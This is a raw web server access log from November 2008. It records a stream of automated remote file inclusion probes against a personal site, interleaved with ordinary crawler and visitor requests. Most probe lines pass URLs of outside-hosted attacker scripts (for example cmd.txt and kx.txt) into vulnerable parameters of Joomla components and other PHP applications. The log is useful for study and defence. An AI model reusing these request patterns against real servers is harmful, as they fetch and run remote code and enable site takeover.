61.50.221.108 - - [04/Nov/2008:08:00:27 -0800] "GET /logs/homepage.php?sel=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:08:00:27 -0800] "GET /homepage.php?sel=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:08:00:33 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:08:00:33 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:00:34 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:00:35 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:00:52 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://damtare.by.ru/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:00:52 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://damtare.by.ru/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:00:53 -0800] "GET /index.php?DOCUMENT_ROOT=http://damtare.by.ru/id.txt????? HTTP/1.1" 200 94716 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:00:55 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://damtare.by.ru/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:08:00:56 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:08:00:56 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:08:00:57 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:08:00:57 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:08:00:58 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:08:00:58 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 200 94721 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:08:01:03 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:08:01:03 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:08:01:04 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:08:01:04 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 200 94737 "-" "libwww-perl/5.805" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:08:01:06 -0800] "GET /apps/apps.php?app=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:08:01:06 -0800] "GET /logs/apps/apps.php?app=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
212.63.65.43 - - [04/Nov/2008:08:01:17 -0800] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:01:22 -0800] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:01:22 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:01:22 -0800] "GET /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:01:26 -0800] "GET /logs/access_081007.log/browse.php/header.php?prefix=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:01:26 -0800] "GET /browse.php/header.php?prefix=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:01:26 -0800] "GET /logs/browse.php/header.php?prefix=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:08:01:26 -0800] "GET /apps/apps.php?app=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:08:01:26 -0800] "GET /logs/apps/apps.php?app=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
59.126.46.141 - - [04/Nov/2008:08:01:35 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:08:01:56 -0800] "GET /logs/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:08:01:56 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:08:02:02 -0800] "GET /logs/access_080703.log/index.php?go=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
65.55.211.37 - - [04/Nov/2008:08:03:10 -0800] "GET /bikes/dteel/2008_07_03/?S=A HTTP/1.1" 200 851 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.37 - - [04/Nov/2008:08:03:10 -0800] "GET /bikes/dteel/2008_07_03/?S=D HTTP/1.1" 200 851 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:48 -0800] "GET /logs/access_080131.log//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:48 -0800] "GET /logs//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:48 -0800] "GET /index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 200 94658 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:49 -0800] "GET /logs/access_080131.log//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:49 -0800] "GET /logs//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:49 -0800] "GET /logs/access_080303.log//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:50 -0800] "GET /index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 200 94658 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:50 -0800] "GET /logs/access_080131.log//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:50 -0800] "GET /logs//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:51 -0800] "GET /logs/access_080303.log//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:51 -0800] "GET /index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 200 94674 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:03:52 -0800] "GET /logs/access_080303.log//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.26.91 - - [04/Nov/2008:08:03:54 -0800] "GET /index.php?CONTENT_PG=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 200 94730 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:04:15 -0800] "GET /logs/access_080909.log/nuseo/admin/nuseo_admin_d.php?nuseo_dirhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:04:15 -0800] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dirhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:04:15 -0800] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dirhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.41 - - [04/Nov/2008:08:04:50 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.41 - - [04/Nov/2008:08:04:51 -0800] "GET /blog HTTP/1.1" 301 85 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
200.142.148.142 - - [04/Nov/2008:08:05:06 -0800] "GET /components/com_sef/undefined?cr=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:05:32 -0800] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:05:33 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:05:35 -0800] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:05:41 -0800] "GET /logs/access_080208.log/index.php?basepath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:05:42 -0800] "GET /index.php?basepath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 94772 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:05:44 -0800] "GET /logs/index.php?basepath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:08:05:45 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.211.27 - - [04/Nov/2008:08:05:48 -0800] "GET /bikes/occcb/eBayISAPI.dll_files/Thumbs.db HTTP/1.1" 200 109056 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
86.165.40.174 - - [04/Nov/2008:08:05:57 -0800] "GET /logs/access_080526.log HTTP/1.1" 200 1245184 "http://uk.search.yahoo.com/search;_ylt=A1f4cfmthbxItsUAUypLBQx.?p=http%3A%2F%2Fwww.crazywap.co.uk%2Ftest.txt%3F&y=Search&fr=yfp-t-501&ei=UTF-8&rd=r1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:06:04 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:06:04 -0800] "GET /logs/access_080908.log%20//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:06:04 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 94686 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.41 - - [04/Nov/2008:08:06:06 -0800] "GET /blog/ HTTP/1.1" 200 94182 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:06:37 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:06:37 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.25 - - [04/Nov/2008:08:06:49 -0800] "GET /bikes/?D=D HTTP/1.1" 200 2869 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.21.133.252 - - [04/Nov/2008:08:07:10 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
200.21.133.252 - - [04/Nov/2008:08:07:10 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:08:07:35 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:08:07:51 -0800] "GET /errors.php?error=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:08:07:51 -0800] "GET /logs/errors.php?error=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:08:07:54 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:08:17 -0800] "GET /errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:08:17 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:08:17 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:08:17 -0800] "GET /logs/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:08:17 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:08:17 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:08:17 -0800] "GET /errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:08:17 -0800] "GET /logs/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:08:08:20 -0800] "GET /logs//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:08:08:20 -0800] "GET /administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.110.205 - - [04/Nov/2008:08:08:43 -0800] "GET /blog HTTP/1.0" 301 69 "http://search.live.com/results.aspx?q=allan" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [04/Nov/2008:08:08:44 -0800] "GET /blog/ HTTP/1.0" 200 94179 "http://search.live.com/results.aspx?q=allan" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [04/Nov/2008:08:08:45 -0800] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [04/Nov/2008:08:08:45 -0800] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [04/Nov/2008:08:08:45 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [04/Nov/2008:08:08:45 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [04/Nov/2008:08:08:46 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [04/Nov/2008:08:08:46 -0800] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
213.250.2.28 - - [04/Nov/2008:08:08:50 -0800] "GET /logs/access_080918.log//components/com_sef/undefined?cr=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.250.2.28 - - [04/Nov/2008:08:08:50 -0800] "GET /components/com_sef/undefined?cr=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.250.2.28 - - [04/Nov/2008:08:08:50 -0800] "GET /logs//components/com_sef/undefined?cr=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:08:59 -0800] "GET /logs/access_080529.log/nuseo/admin/nuseo_admin_d.php?nuseo_dirhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:09:03 -0800] "GET /logs/access_080404.log/index.php?basepath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.52 - - [04/Nov/2008:08:09:18 -0800] "GET /logs/access_080920.log%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.maxscan.org/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:09:31 -0800] "GET /logs/access_080131.log%20//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:09:38 -0800] "GET /logs/access_080131.log%20//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.19 - - [04/Nov/2008:08:09:40 -0800] "GET /logs/access_080131.log%20//index.php?pagina=http://www.sport4-health.com/s.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.250.2.28 - - [04/Nov/2008:08:10:00 -0800] "GET /logs/access_080811.log//components/com_sef/undefined?cr=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.121 - - [04/Nov/2008:08:10:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
24.67.0.44 - - [04/Nov/2008:08:10:33 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.67.0.44 - - [04/Nov/2008:08:10:33 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.67.0.44 - - [04/Nov/2008:08:10:34 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.67.0.44 - - [04/Nov/2008:08:10:35 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 200 94814 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [04/Nov/2008:08:10:52 -0800] "GET /logs/errors.php?error=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [04/Nov/2008:08:10:53 -0800] "GET /errors.php?error=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:11:05 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:11:30 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:11:33 -0800] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.177 - - [04/Nov/2008:08:12:11 -0800] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
